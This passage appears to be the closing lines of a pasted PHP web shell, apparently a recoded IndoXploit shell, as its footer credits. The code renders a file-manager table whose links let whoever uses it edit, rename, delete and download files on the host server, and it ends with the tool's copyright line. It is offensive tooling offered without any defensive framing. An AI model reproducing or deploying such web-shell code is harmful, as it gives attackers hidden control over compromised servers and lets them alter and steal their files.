  1355. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1356. echo "<td class='td_home'><center>$ftype</center></td>";
  1357. echo "<td class='td_home'><center>$size</center></td>";
  1358. echo "<td class='td_home'><center>$ftime</center></td>";
  1359. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1360. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1361. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1362. echo "</tr>";
  1363. }
  1364. echo "</table>";
  1365. if(!is_readable($dir)) {
  1366. //
  1367. } else {
  1368. echo "<hr>";
  1369. }
  1370. echo "<center>Copyright IndoXploit &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=lime>Recoded By Loscardos </font></a></center>";
  1371. }
  1372. ?>
  1373. </html>
Add Comment
Please, Sign In to add comment